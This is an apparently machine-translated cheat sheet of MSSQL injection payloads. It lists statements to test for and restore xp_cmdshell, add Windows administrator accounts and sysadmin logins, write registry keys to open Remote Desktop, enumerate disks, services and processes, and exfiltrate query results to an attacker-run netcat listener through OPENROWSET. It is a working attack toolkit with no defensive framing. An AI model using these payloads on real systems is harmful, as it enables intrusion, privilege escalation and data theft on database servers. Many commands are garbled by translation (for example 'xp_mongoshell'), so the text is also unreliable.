Frequently Used commands for MSSQL Injection

① Whether xp_cmdshell exists

And 1 = (select count (*) from Master. DBO. sysobjects where xtype = 'X' and name = 'xp _ Your shell ')

② Run the command with xp_cmdshell

; Exec master.. xp_cmdshell "Net user name password/Add "--
; Exec master.. xp_cmdshell "net localgroup name administrators/Add "--

③ View Permissions

And (select is_srvrolemember ('sysadmin') = 1 -- // SA
And (select is_member ('db _ owner') = 1 -- // DBO
And (select is_member ('public') = 1 -- // public

④ Create an account to log on to MSSQL

; Exec master. DBO. sp_addlogin name, pass ;--

⑤ Upgrade the created MSSQL login account to SysAdmin

; Exec master. DBO. SP_ADDSRVROLEMEMBER name, SysAdmin ;--

6. Open 3389

'Exec master .. xp_regwrite @ r, 'Software \ Microsoft \ Windows \ CurrentVersion \ netcache', 'enable', 'reg _ SZ ', '0 ';----
; Declare
@ R varchar (255) set @ r = 'HKEY _ LOCAL_MACHINE 'exec master .. xp_regwrite
@ R, 'Software \ Microsoft \ Windows
NT \ CurrentVersion \ Winlogon ', 'shutdownwithoutlogon', 'reg _ SZ ', '0 ';----
; Declare
@ R varchar (255) set @ r = 'HKEY _ LOCAL_MACHINE 'exec master .. xp_regwrite
@ R, 'Software \ Policies \ Microsoft \ Windows \ installer', 'enableadmintsremote', 'reg _ dword', 1 ;----

; Declare @ r varchar (255) set @ r = 'HKEY _ LOCAL_MACHINE 'Exec
Master .. xp_regwrite @ r, 'System \ CurrentControlSet \ Control \ Terminal
Server ', 'tsenabled', 'reg _ dword', 1 ;----
; Declare @ r varchar (255) Set
@ R = 'HKEY _ LOCAL_MACHINE 'exec master .. xp_regwrite
@ R, 'System \ CurrentControlSet \ Services \ termdd ', 'start', 'reg _ dword', 2 ;----

; Declare @ r varchar (255) set @ r = 'HKEY _ LOCAL_MACHINE 'Exec
Master .. xp_regwrite
@ R, 'System \ CurrentControlSet \ Services \ termservice ', 'start', 'reg _ dword', 2 ;----

; Declare @ r varchar (255) set @ r = 'HKEY _ LOCAL_MACHINE 'Exec
Master .. xp_regwrite 'HKEY _ users', '. Default \ keyboard
Layout \ toggle ', 'hotkey', 'reg _ SZ', '1 ';----
; Declare @ r varchar (255) set @ r = 'HKEY _ LOCAL_MACHINE 'exec master .. xp_mongoshell 'isreset/reboot ';----

 

7. Delete and restore xp_mongoshell

1. Restore xp_mongoshell
Delete the xp_mongoshell statement in the extended stored procedure
exec sp_dropextendedproc 'xp _ mongoshell'

2. Restore the SQL statement of mongoshell
exec sp_addextendedproc xp_mongoshell, @ dllname = 'loglog70. dll '

exec master. DBO. addextendedproc 'xp _ Your shell', 'xp log70. dll '; select count (*) from master. DBO. sysobjects where xtype = 'X' and
If the returned result is 1, OK

otherwise, upload c: \ inetput \ WEB \ xplog70.dll
exec master. DBO. sp_addextendedproc 'xp _ external shell', 'c: \ inetput \ WEB \ xplog70.dll '; --

3. Use the following methods to delete
drop procedure sp_addextendedproc
drop procedure sp_oacreate
exec sp_dropextendedproc 'xp _ shortshell'

use the following statement to restore
DBCC addextendedproc ("sp_oacreate", "odsole70.dll")
DBCC addextendedproc ("xp_mongoshell", "xplog70.dll ")
in this way, you can directly restore the database. You do not have to worry about whether sp_addextendedproc exists.

Methods for obtaining Database Server IP address with DB permission and separate MSSQL database server IP Address

1. Local NC listening nc-vvlp 80

2. Insert
Into
OpenRowSet ('sqloledb', 'uid = sa; Pwd = xxx; Network = dbmssocn; address = your IP address, 80;
', 'Select * From dest_table') Select * From src_table ;--

 

Extensions of explain and MSSQL

-- Obtain the ms SQL version/MSSQL version
Execute master .. sp_msgetversion // DBO public

-- Obtain the hard disk file information // DBO public
-- Parameter description: directory name, directory depth, whether to display files // read disk directories and files
Execute master .. xp_dirtree 'C: '// list all c: \ files and directories, subdirectories
Execute master .. xp_dirtree 'C: ', 1 // only column C: \ Folder
Execute master .. xp_dirtree 'C: ', // column C: \ folder and file

-- List all Windows Local Groups on the server
Execute master .. xp_enumgroups // DBO

-- Obtain the computer name of the current SQL Server server // obtain the computer name
Execute master .. xp_getnetname // DBO public

-- List all sub-directories under a specified directory
Exec [Master]. [DBO]. [xp_subdirs] 'C: \ WINNT '// you can list directories.

-- List the fixed drives on the server and the available space for each drive
Execute master .. xp_fixeddrives // DBO public

-- Display available drive letters on the System
Execute master .. xp_availablemedia // DBO

-- Get the attributes of a file
Execute master .. xp_getfiledetails 'C: 1.txt '// DBO public

-- Details of each table in the Statistics Database
Exec sp_msforeachtable 'SP _ spaceused ''? ''' // Query the table // DBO public

-- Obtain the number and capacity of records for each table
Exec sp_msforeachtable 'select ''? ''','? ', 'SP _ spaceused ''? ''', 'Select count (*) from? '// DBO pubilc

-- Update the null value of the note column in Table1/Table2
Sp_msforeachtable 'Update? Set note = ''' where note is null', null, 'and O. Name in (''table1', ''table2 '')

-- List server domain names
Xp_ntsec_enumdomains // machine name // DBO public

-- Stop or start a service
Xp_servicecontrol 'stop', 'schedule' // schedule is the service name // DBO

-- Use PID to stop an executionProgram
Xp_terminate_process 123 // 123 is PID // DBO

-- Only list subdirectories in a directory
DBO. xp_subdirs 'C: '// DBO

-- Server security mode information
Xp_loginconfig // DBO

Xp_regaddmultistring
Xp_regdeletekey
Xp_regdeletevalue
Xp_regenumkeys
Xp_regenumvalues
Xp_regread
Xp_regremovemultistring
Xp_regwrite

-- Register the name of the new extended stored procedure to Microsoft? SQL Server? .
Sp_addextendedproc xp_cmdshell, @ dllname = 'loglog70. dll '// restore xp_cmdshell

The restore process sp_addextendedproc is as follows:
Create procedure sp_addextendedproc --- 1996/08/30 20:13
@ Functname nvarchar (517),/* (owner.) Name of function to call */
@ Dllname varchar (255)/* Name of DLL containing function */
As
Set implicit_transactions off
If @ trancount> 0
Begin
Raiserror (15002,-1,-1, 'SP _ addextendedproc ')
Return (1)
End
DBCC addextendedproc (@ functname, @ dllname)
Return (0) -- sp_addextendedproc

Create a new Microsoft? SQL Server? Login // only members of the SysAdmin and securityadmin fixed server roles can execute sp_addlogin.

 

 

Patch version
8.00.760 indicates the SQL Server version and patch number. The relationship is as follows:

8.00.194 ------- SQL Server 2000 RTM
8.00.384 ------- (SP1)
8.00.534 ------- (SP2)
8.00.760 ------- (SP3)